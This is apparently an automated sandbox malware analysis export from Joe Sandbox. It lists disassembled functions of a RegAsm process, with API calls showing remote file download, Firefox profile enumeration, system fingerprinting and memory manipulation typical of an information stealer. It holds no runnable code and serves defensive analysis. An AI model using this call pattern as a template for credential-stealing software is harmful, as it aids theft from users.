StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00413CC0

Strings

ERROR, xrefs: 00413CAE
ERROR, xrefs: 00413CE8

Memory Dump Source

Source File: 00000003.00000002.2942073770.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2942073770.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: HttpInternet$H_prologOpenRequest$ConnectInfoOptionQuerySendlstrcpy
String ID: ERROR$ERROR
API String ID: 1120091252-2579291623
Opcode ID: a7b37041b232a445b1908f1e3c872feaca981cb3295f342746fd07995674bbfa
Instruction ID: e3fbed272d2cb13d9065376ff84fd360f3e708577589886be960e394f81ae2c9
Opcode Fuzzy Hash: a7b37041b232a445b1908f1e3c872feaca981cb3295f342746fd07995674bbfa
Instruction Fuzzy Hash: 74215374900249DEDB00FFA5C6567DD7BF8AF14308F50409EE815A3282DBB95B88CBA6

Function 00415718 Relevance: 6.1, APIs: 4, Instructions: 76sleepsynchronizationthreadCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0041571D

Part of subcall function 00414083: _EH_prolog.MSVCRT ref: 00414088

Sleep.KERNEL32(000003E8,?,?,?,?,?,00000000), ref: 004157A1
CreateThread.KERNEL32(00000000,00000000,00413F49,?,00000000,00000000), ref: 004157C3
WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004157CB

Memory Dump Source

Source File: 00000003.00000002.2942073770.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2942073770.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prolog$CreateObjectSingleSleepThreadWait
String ID:
API String ID: 2678630583-0
Opcode ID: f339ccc6440d48d5a7c1ae1b903a49d780caed32d0677df4a186e724ee32cef5
Instruction ID: f828d1a5eb37dd9722f390d0bb1fad2d66e1c29c074f24ee2c894cbe4c739655
Opcode Fuzzy Hash: f339ccc6440d48d5a7c1ae1b903a49d780caed32d0677df4a186e724ee32cef5
Instruction Fuzzy Hash: 72315E75900248EFDB11DFA5C985AEEBBB8FF04304F10412AFC06A3241DB785A89CB65

Function 00410AC1 Relevance: 6.0, APIs: 4, Instructions: 35memoryregistryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000001,?,?,?,0041621D,00000000,?,Processor: ,00000000,?,[Hardware],00000000,?,00427860), ref: 00410AD5
HeapAlloc.KERNEL32(00000000,?,?,?,0041621D,00000000,?,Processor: ,00000000,?,[Hardware],00000000,?,00427860,00000000,?), ref: 00410ADC
RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00000000,?,?,?,0041621D,00000000,?,Processor: ,00000000,?,[Hardware],00000000,?), ref: 00410AFA
RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,000000FF,?,?,?,0041621D,00000000,?,Processor: ,00000000,?,[Hardware],00000000), ref: 00410B16

Memory Dump Source

Source File: 00000003.00000002.2942073770.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2942073770.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocOpenProcessQueryValue
String ID:
API String ID: 3676486918-0
Opcode ID: 2b363aa90745a8f8d824aff97fdbfa3c8cccd02006d9d5c97071748192452288
Instruction ID: 4996d2bb6236a55b2b9636600fec6b45b687d106d1053149a3733a28d9f569fa
Opcode Fuzzy Hash: 2b363aa90745a8f8d824aff97fdbfa3c8cccd02006d9d5c97071748192452288
Instruction Fuzzy Hash: 9BF05E79640248FFEB104BD0ED0EFAA7E7EEB46B05F201064F701EA1A0D7B09990DB60

Function 00402308 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 116COMMON

Download Yara Rule

APIs

??_U@YAPAXI@Z.MSVCRT ref: 0040238D

Strings

6%@, xrefs: 0040242C, 00402420
6%@, xrefs: 00402312, 0040231B

Memory Dump Source

Source File: 00000003.00000002.2942073770.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2942073770.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: 6%@$6%@
API String ID: 0-3369382886
Opcode ID: b80924a359a6f8531f8ae78abe5c995f945ee7434348832ced30233f9b29c213
Instruction ID: 546b5330e622f1b68155b3540875f8cca37e3c17362e15b04739727e0ff4f9ed
Opcode Fuzzy Hash: b80924a359a6f8531f8ae78abe5c995f945ee7434348832ced30233f9b29c213
Instruction Fuzzy Hash: 574133715001299FCB11CF69D8806EDBBB1FF89318F1485BADD55EB391C378AA828B94

Function 00407D06 Relevance: 4.7, APIs: 3, Instructions: 231stringCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00407D0B

Part of subcall function 004105CC: lstrcpy.KERNEL32(00000000,00000000), ref: 004105F6

lstrlenA.KERNEL32(00000000), ref: 00407F42
lstrlenA.KERNEL32(00000000), ref: 00407F56

Part of subcall function 00410745: _EH_prolog.MSVCRT ref: 0041074A
Part of subcall function 00410745: lstrlenA.KERNEL32(?,?,?,?,?,004185FE,?,?,00427BEC,?,00000000,00427727), ref: 00410772
Part of subcall function 00410745: lstrcpy.KERNEL32(00000000), ref: 00410799
Part of subcall function 00410745: lstrcat.KERNEL32(?,?), ref: 004107A4

Part of subcall function 004106D1: _EH_prolog.MSVCRT ref: 004106D6
Part of subcall function 004106D1: lstrcpy.KERNEL32(00000000), ref: 00410722
Part of subcall function 004106D1: lstrcat.KERNEL32(?,?), ref: 0041072C

Part of subcall function 0041068A: lstrcpy.KERNEL32(00000000,?), ref: 004106C3

Part of subcall function 00410603: lstrcpy.KERNEL32(00000000,r~A), ref: 00410629

Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6

Part of subcall function 00415718: _EH_prolog.MSVCRT ref: 0041571D
Part of subcall function 00415718: CreateThread.KERNEL32(00000000,00000000,00413F49,?,00000000,00000000), ref: 004157C3
Part of subcall function 00415718: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004157CB

Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066

Memory Dump Source

Source File: 00000003.00000002.2942073770.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2942073770.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prolog$lstrcpy$lstrlen$lstrcat$CreateObjectSingleThreadWait
String ID:
API String ID: 3193997572-0
Opcode ID: e7055e61ba0a30503c12486c087aefb7c264d95e40322facf132a7ef5020d9c2
Instruction ID: fd5990958842b3f388bee7a01f2c900b0a08f14a04a8e1953e9a9e6841a7a9c3
Opcode Fuzzy Hash: e7055e61ba0a30503c12486c087aefb7c264d95e40322facf132a7ef5020d9c2
Instruction Fuzzy Hash: 13A16131804288EADF05EBE5C955BEDBBB4AF18304F10405EE459731C2EFB91B98DB66

Function 00411CAA Relevance: 4.5, APIs: 3, Instructions: 28COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,00415C13), ref: 00411CC2
K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00411CDD
CloseHandle.KERNEL32(00000000), ref: 00411CE4

Memory Dump Source

Source File: 00000003.00000002.2942073770.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2942073770.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CloseFileHandleModuleNameOpenProcess
String ID:
API String ID: 3183270410-0
Opcode ID: 6869b2f5b54fac27cc4a51c9ad570f4988e9f4c71a0d1c26986a834b9f28d2d5
Instruction ID: 71011fbe4d295fbb79864fa6f4c658946cae313061cff26c5122ac9aa06e3757
Opcode Fuzzy Hash: 6869b2f5b54fac27cc4a51c9ad570f4988e9f4c71a0d1c26986a834b9f28d2d5
Instruction Fuzzy Hash: B6F0A039501228BBDB20AB90CC09FD93B6DBB05745F000051FB41AA190DBB4DAC48BD8

Function 00412FC2 Relevance: 4.2, APIs: 1, Strings: 1, Instructions: 657COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00412FC7

Part of subcall function 004105CC: lstrcpy.KERNEL32(00000000,00000000), ref: 004105F6

Part of subcall function 004106D1: _EH_prolog.MSVCRT ref: 004106D6
Part of subcall function 004106D1: lstrcpy.KERNEL32(00000000), ref: 00410722
Part of subcall function 004106D1: lstrcat.KERNEL32(?,?), ref: 0041072C

Part of subcall function 00410745: _EH_prolog.MSVCRT ref: 0041074A
Part of subcall function 00410745: lstrlenA.KERNEL32(?,?,?,?,?,004185FE,?,?,00427BEC,?,00000000,00427727), ref: 00410772
Part of subcall function 00410745: lstrcpy.KERNEL32(00000000), ref: 00410799
Part of subcall function 00410745: lstrcat.KERNEL32(?,?), ref: 004107A4

Part of subcall function 0041068A: lstrcpy.KERNEL32(00000000,?), ref: 004106C3

Part of subcall function 00410603: lstrcpy.KERNEL32(00000000,r~A), ref: 00410629

Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6

Part of subcall function 00404DCA: _EH_prolog.MSVCRT ref: 00404DCF
Part of subcall function 00404DCA: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404E1E
Part of subcall function 00404DCA: StrCmpCA.SHLWAPI(?), ref: 00404E38
Part of subcall function 00404DCA: InternetOpenUrlA.WININET(?,00000000,00000000,00000000,-00800100,00000000), ref: 00404E5C
Part of subcall function 00404DCA: CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00404E7D
Part of subcall function 00404DCA: InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 00404EC8
Part of subcall function 00404DCA: CloseHandle.KERNEL32(?,?,00000400), ref: 00404EE2
Part of subcall function 00404DCA: InternetCloseHandle.WININET(00000000), ref: 00404EE9
Part of subcall function 00404DCA: InternetCloseHandle.WININET(?), ref: 00404EF2

Part of subcall function 00404DCA: WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00404EA4

Strings

B, xrefs: 00413853

Memory Dump Source

Source File: 00000003.00000002.2942073770.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2942073770.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prologInternetlstrcpy$CloseFileHandle$Openlstrcat$CreateReadWritelstrlen
String ID: B
API String ID: 1244342732-1255198513
Opcode ID: cd18c8aa25720546d1ad7633c9db8fcd4535b377c35ec04f34781e4599a9f6c5
Instruction ID: 0938f165b72499c527ccdd6b8e90f5330d99a98d6a9f1a2685abfc9b2ff645ff
Opcode Fuzzy Hash: cd18c8aa25720546d1ad7633c9db8fcd4535b377c35ec04f34781e4599a9f6c5
Instruction Fuzzy Hash: 4452637090528CEEDF05E7E5C955BDDBBB46F19308F14408EE44963282DBB81BC8DB66

Function 0040C3F1 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 240COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0040C3F6

Part of subcall function 004105CC: lstrcpy.KERNEL32(00000000,00000000), ref: 004105F6

Part of subcall function 004119CA: SHGetFolderPathA.SHELL32(00000000,00426D17,00000000,00000000,?), ref: 004119FB

Part of subcall function 004106D1: _EH_prolog.MSVCRT ref: 004106D6
Part of subcall function 004106D1: lstrcpy.KERNEL32(00000000), ref: 00410722
Part of subcall function 004106D1: lstrcat.KERNEL32(?,?), ref: 0041072C

Part of subcall function 0041068A: lstrcpy.KERNEL32(00000000,?), ref: 004106C3

Part of subcall function 00410745: _EH_prolog.MSVCRT ref: 0041074A
Part of subcall function 00410745: lstrlenA.KERNEL32(?,?,?,?,?,004185FE,?,?,00427BEC,?,00000000,00427727), ref: 00410772
Part of subcall function 00410745: lstrcpy.KERNEL32(00000000), ref: 00410799
Part of subcall function 00410745: lstrcat.KERNEL32(?,?), ref: 004107A4

Part of subcall function 00410603: lstrcpy.KERNEL32(00000000,r~A), ref: 00410629

Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6

Part of subcall function 0040BFA5: _EH_prolog.MSVCRT ref: 0040BFAA
Part of subcall function 0040BFA5: FindFirstFileA.KERNEL32(00000000,?,00000000,?,00426FF0,?,?,00426CC3,?,00000000,?), ref: 0040C029
Part of subcall function 0040BFA5: StrCmpCA.SHLWAPI(?,00426FF4,?,00000000,?), ref: 0040C04D
Part of subcall function 0040BFA5: StrCmpCA.SHLWAPI(?,00426FF8,?,00000000,?), ref: 0040C067
Part of subcall function 0040BFA5: StrCmpCA.SHLWAPI(?,prefs.js,00000000,?,?,?,00426FFC,?,?,00426CCE,?,00000000,?), ref: 0040C103

Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066

Strings

\..\, xrefs: 0040C4BE

Memory Dump Source

Source File: 00000003.00000002.2942073770.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2942073770.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prolog$lstrcpy$lstrcat$FileFindFirstFolderPathlstrlen
String ID: \..\
API String ID: 271224408-4220915743
Opcode ID: 199636d6e85567b9e143d20f4900d6e933523468e3e8462847e761aeb1257e4a
Instruction ID: 7019cd6498efa02982f05fc8720b97e45e821be24320146e51029c917ee417a0
Opcode Fuzzy Hash: 199636d6e85567b9e143d20f4900d6e933523468e3e8462847e761aeb1257e4a
Instruction Fuzzy Hash: 98A1A27180128CEACF04FBE5DA56BDD7BB4AF15308F10405EE84563282DBB81798DBA7

Function 004068A6 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,?,00000002,00000002,?,00000000,?,?,004069D5), ref: 00406925

Strings

, xrefs: 004068F8

Memory Dump Source

Source File: 00000003.00000002.2942073770.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2942073770.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-3916222277
Opcode ID: facaf9998fc06faa0ee2e819c6c62d0306347248abf4841bf45ac669fd6d1d92
Instruction ID: 5e75f0100221d65c446831c555f1be12f37bb82bbff3666d80871c6a46f7d7f5
Opcode Fuzzy Hash: facaf9998fc06faa0ee2e819c6c62d0306347248abf4841bf45ac669fd6d1d92
Instruction Fuzzy Hash: 7A11C1B2505219EBEB20DF98C9447AAB7E4FB04300F214426DA43E76C0DB3CDA65EB59

Function 0041114B Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 18COMMON

Download Yara Rule

APIs

GetCurrentHwProfileA.ADVAPI32(?), ref: 0041115C

Strings

Unknown, xrefs: 0041116F

Memory Dump Source

Source File: 00000003.00000002.2942073770.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2942073770.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CurrentProfile
String ID: Unknown
API String ID: 2104809126-1654365787
Opcode ID: 28b185da4ed2b7cf45b5592012293e138cb5e4b93c60724aa9fcef36ef65f897
Instruction ID: 90c22a2c619ed5e073b4da054bd96da4f657307ae497a6fe73aa4f4ee55c0afe
Opcode Fuzzy Hash: 28b185da4ed2b7cf45b5592012293e138cb5e4b93c60724aa9fcef36ef65f897
Instruction Fuzzy Hash: 46E0EC70A0420DFBDB10DBA4D846FD97BBC6B08349F504415EA0192191DA78D649DBA9

Function 1B4004D0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 15COMMON

Download Yara Rule

Strings

failed to allocate %u bytes of memory, xrefs: 1B4004E7

Memory Dump Source

Source File: 00000003.00000002.2948514769.000000001B3D8000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B3D0000, based on PE: true

Associated: 00000003.00000002.2948466177.000000001B3D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B3D1000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B536000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B5DD000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5DF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5E8000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949558249.000000001B612000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1b3d0000_RegAsm.jbxd

Similarity

API ID:
String ID: failed to allocate %u bytes of memory
API String ID: 0-1168259600
Opcode ID: 8595038b8c74ca9a0f3510aa3ace9a2f0e0bfbb85d48c34e561d5b0ae81d4d2d
Instruction ID: 3c5fffe791f1d92cf43257ef5c3309a1f071aa1064ca641f67156efbe61f57c3
Opcode Fuzzy Hash: 8595038b8c74ca9a0f3510aa3ace9a2f0e0bfbb85d48c34e561d5b0ae81d4d2d
Instruction Fuzzy Hash: A8D01227D8873663DA211290AC02ACA7D514B505A1F058134FD4C59320D955AC6193E2

Function 00411986 Relevance: 3.0, APIs: 2, Instructions: 23COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0041198B
GetFileAttributesA.KERNEL32(00000000,?,0040C604,?,00426CD2,?,?), ref: 0041199F

Memory Dump Source

Source File: 00000003.00000002.2942073770.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2942073770.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AttributesFileH_prolog
String ID:
API String ID: 3244726999-0
Opcode ID: ddfea7d7d2adc6bf9e30c9c3b75ce10fbdff6c5a6741d623e970fa6852d2218d
Instruction ID: a51631a7eda10409868c7481a61c52544e1b723ac48357d59f871c55471c7a6c
Opcode Fuzzy Hash: ddfea7d7d2adc6bf9e30c9c3b75ce10fbdff6c5a6741d623e970fa6852d2218d
Instruction Fuzzy Hash: 65E092709005249BCB149F64D5115CE7721EF01764F50831BE976D22E0CB385A87C689

Function 00406590 Relevance: 2.6, APIs: 2, Instructions: 68memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(?,00000000,00003000,00000040,?,00000000,?,?,00406992,00000000,00000000), ref: 004065EF
VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000040,?,00000000,?,?,00406992,00000000,00000000), ref: 0040661B

Memory Dump Source

Source File: 00000003.00000002.2942073770.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2942073770.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
